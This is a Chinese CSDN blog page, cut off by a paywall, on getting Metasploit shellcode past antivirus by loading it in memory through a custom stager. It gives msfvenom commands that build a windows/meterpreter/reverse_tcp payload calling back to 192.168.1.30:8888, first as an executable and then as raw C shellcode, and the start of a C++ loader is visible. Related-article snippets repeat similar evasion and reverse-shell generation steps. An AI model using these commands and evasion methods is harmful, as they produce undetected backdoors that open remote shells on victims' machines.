java 加载shellcode_动态加载 ShellCode绕过杀软

最新推荐文章于 2024-04-22 09:53:35 发布
最新推荐文章于 2024-04-22 09:53:35 发布
阅读量522 收藏 1
点赞数
文章标签: java 加载shellcode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32529429/article/details/114713416
版权

反病毒解决方案用于检测恶意文件,并且通常使用静态分析技术来区分二进制文件的好坏。如果是恶意文件本身包含恶意内容(ShellCode),那么依靠静态分析技术会非常有效,但如果攻击者使用轻量级的stager来代替下载并将代码加载到内存中,会发生什么?事实证明这样做可以绕过大多数杀软的查杀。

虽然这种绕过方法并不是新鲜技术,但绕过反病毒软件对于大多数后门来说都是必要的,在这篇文章中,我们将使用virscan作为我们的检测工具,并使用Metasploit生成一些反向的ShellCode作为我们的攻击载荷。通过使用virscan云鉴定技术,可以衡量出Payload的是否免杀,但需要注意的是,只有动态检测或基于行为的检测,才能真正捕获到现实世界中的Payload。

首先我们使用 msfvenom 命令创建一个具有反向连接Shell的可执行文件,生成命令(Linux)如下:

[root@localhost ~]# msfvenom –p windows/meterpreter/reverse_tcp \

> lhost=192.168.1.30 lport=8888 \

> -f exe -o lyshark.exe

上方的代码就可以生成一个lyshark.exe的可执行文件,将此文件上传到VirusTotal,发现它会被大量反病毒引擎所查杀,这是正常的,因为它是一个常见的Payload,许多安全厂商都会针对Metasploit进行特征码的提取与查杀。

嵌入式 Shellcode

通过上方的方式生成后门文件是不可取的,因为大多数反病毒厂商都掌握了Metasploit可执行模板的签名,因此我们决定创建自己的可执行文件,然后手动实现 ShellCode的加载工作。我们再次使用 msfvenom 命令,但在这次只生成 ShellCode,而不是完整的可执行文件:

[root@localhost ~]# msfvenom -a x86 --platform Windows \

> -p windows/meterpreter/reverse_tcp \

> -b '\x00\x0b' LHOST=192.168.1.30 LPORT=8888 -f c

上方代码会生成一个Payload有效载荷,这里我们需要记下来,然后将ShellCode复制到一个单独的C++源文件中,然后编译生成一个可执行文件。

#include

#include

using namespace s

最低0.47元/天 解锁文章
嬉游君
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
总结加载Shellcode的各种方式(更新中!)
xf555er的博客
05-24 2335
异步过程调用(APC)队列是一个与线程关联的队列,用于存储要在该线程上下文中异步执行的函数。操作系统内核会跟踪每个线程的 APC 队列,并在适当的时机触发队列中挂起的函数。APC 队列通常用于实现线程间的异步通信、定时器回调以及异步 I/O 操作。内核模式 APC:由内核代码发起,通常用于处理内核级别的异步操作,如异步 I/O 完成。用户模式 APC:由用户代码发起,允许用户态应用程序将特定函数插入到线程的 APC 队列中,以便在线程上下文中异步执行。
shellCode免杀技巧
qq_39330735的博客
05-15 2289
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
探索Shellcode_Loader:一款高效、灵活的Shellcode加载
最新发布
gitblog_00002的博客
04-22 540
探索Shellcode_Loader:一款高效、灵活的Shellcode加载器 项目地址:https://gitcode.com/Avienma/shellcode_loader 在安全研究和逆向工程领域,Shellcode是一个关键元素,它是一段可以直接由处理器执行的小型机器码程序。然而,如何安全且有效地加载这些代码并不总是那么简单。这就是Shellcode_Loader项目的用武之地。本文将带...
免杀对抗-java语言-shellcode免杀-源码修改+打包exe
xiaoheizi的博客
09-21 1020
命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f jar -o msf.jar。1.点击启动jd-gui,将生成的msf.jar拖入其中进行反编译,点击file—save all sources导出反编译后的内容。1.将exe4j打包的exe程序再使用inno工具和jdk环境打包合并到一起,将文件上传目标系统,成功绕过检测。命令:jar cvfm 名称.jar META-INF/MANIFEST.MF .
【网络资源学习笔记】ShellCode相关内容学习
天在等我,菜鸟想飞
07-14 2484
个人shellcode相关网络资源学习记录
Java内存的利用技巧——通过jsp加载Shellcode
m0_69860228的博客
05-06 709
0x00 前言 本文基于rebeyond的《Java内存攻击技术漫谈》,以Tomcat环境为例,介绍通过jsp加载Shellcode的方法,开源代码,记录细节。 0x01 简介 本文将要介绍以下内容: 依赖tools.jar加载Shellcode 自定义类加载Shellcode 0x02 依赖tools.jar加载Shellcode 1.Java实现 通过enqueue函数加载Shellcode,测试代码: import java.lang.reflect.Method; public
基于Java实现的Shellcode加载器源码+项目说明.zip
12-29
基于Java实现的Shellcode加载器源码+项目说明.zip基于Java实现的Shellcode加载器源码+项目说明.zip基于Java实现的Shellcode加载器源码+项目说明.zip基于Java实现的Shellcode加载器源码+项目说明.zip
绕过AV:免杀shellcode加载
03-04
条件触发式远控VT 6/70免杀国内杀软及后卫,卡巴斯基等主流杀软 原理 使用 将shellcode填至go_shellcode_encode.py生成重复后的base64有效负载然后将生成的payload填至main.go build(“ b64shellcode”)将main.go...
利用图片隐写术来远程动态加载shellcode1
08-03
1. 最开头的两个十六进制为 42H,4DH 转为 ASCII 后分别表示 BM,所有的 BMP 文件都以这 2. 红色箭头是图片的大小(这里对应的十六进制为
CDL_shellcode_源码
10-02
Shellcode在安全研究和逆向工程中扮演着重要角色,它可以直接在目标进程中运行,绕过安全机制,执行攻击者指定的操作。在本案例中,"CDL_shellcode_源码" 提供的是一种JavaScript实现的ShellcodeJavaScript ...
此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell
09-20
标题"此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell"表明包含的源代码是专门设计用来在Linux x86系统上生成shellcode的。"rar"文件可能是源代码的压缩包,而"shellcode_shell"可能指的是该...
shellcode编程揭秘
03-04
教你怎么写shellcode,很好的shellcode编程范例,从稳定性到安全性都有讲
shellload:将shellcode加载到新进程中,可以选择使用假名称
05-17
壳载 将shellcode加载到新进程中,可以选择将其隐藏在错误的进程名称下。 用法 简单的用法是将您的shellcode(十六进制编码)通过管道传输到stdin。 这将在当前的shellload进程中运行shellcode。 (提供的示例shellcode将运行touch itworks命令) $ printf "6a3b589948bb2f62696e2f736800534889e7682d6300004889e652e80e000000746f756368206974776f726b730056574889e60f05" | ./shellload64 中间用法是将shellcode作为参数传递。 这会产生一个运行shellcode的后台进程。 $ ./shellload64 6a3b589948bb2f62696e2f736800534889e7682d630000488
java 加载shellcode_各种语言实现Shellcode加载(暂时两种)
weixin_39660931的博客
02-26 534
原理:使用Shellcode加载器分离的方法,方法很low,但是值得尝试Python参考自K8Shellcode混合加密造轮子,造轮子QAQ(K8师傅的那个已经过不了检测了)编译用法的话则是结果如下虽然VT检出率挺高的但是过360还是可以的估计动态免杀是过不了的参考资料C/C++语言实现Shellcode加载Shellcode的代码C++这些东西还是不太懂得,大约就是申请虚拟内存,将shel...
java 加载shellcode_通用Shellcode加载
weixin_35780426的博客
02-26 935
Shellcode加载器是一种基本的规避技术。尽管shellcode加载器通常可以促进payload的初始执行,但是启发式检测方法仍可以标记payload的其他方面和行为。例如,很多安全产品可能会在内存中时对其进行检测,或者将特定的网络流量检测为恶意。我们将研究一些适合与加载器结合使用的后期开发框架,并研究如何嵌入其他类型的二进制文件(例如.NET和已编译的PE二进制文件)。博客系列的第一部分将介...
java 加载shellcode_多阶段加载shellcode
weixin_31759829的博客
02-26 419
介绍多阶段加载是基于如下这种想法:如果一个小片段的shellcode可以在目标上执行,理论上可以通过网络连接、传输和执行其他的shellcode,或者甚至是一个完整的二进制可执行文件。关键的想法是对加载的最终程序进行分级。这样子,只有严格大小的代码会在第一阶段加载。这种想法在一篇优秀的文章<>中有详细介绍。第一阶段:shellcode加载这是在加载链中至关重要的一步。代码必须够小,没有...
*nux编程的108种奇淫巧计-6(shellcode)
pennyliang的专栏
11-04 2511
shellcode已经接近病毒的范畴了,但本文不打算让大家学习病毒,只是通过一个简单的例子,告诉大家shellcode是怎么来的。
学习写一个shellcode
tmzk的学习笔记
05-16 1639
一个简单的shellcode 最近对安全技术比较感兴趣,买了本灰帽黑客来看,发现书中的代码都是基于32位系统的,不能很好的在自己的X64架构的64位系统(Ubuntu15.10)上实验其代码,考虑到现在已经是64位的时代了,有必要搞懂在64位下如何实现,因此找了些相关的资料研究,终于把看懂的关于shellcode入门的32位汇编代码转成了64位的。 先看书本上32的汇编代码:
黑客攻防入门(二)shellcode构造
热门推荐
不断攀登
07-28 1万+
1. 概说shell我们都知道是什么了吧! 狭义的shellcode 就是一段可以运行shell的代码!构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖掉正常的返回地址。shellcode通常放在缓冲区内,也可以通过环境变量存入堆内,也可以通过动态内存放入堆区。下面我们学习一下怎样构造shellcode。 注意: 我是在Centos 64位的系统下进行测试和构

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值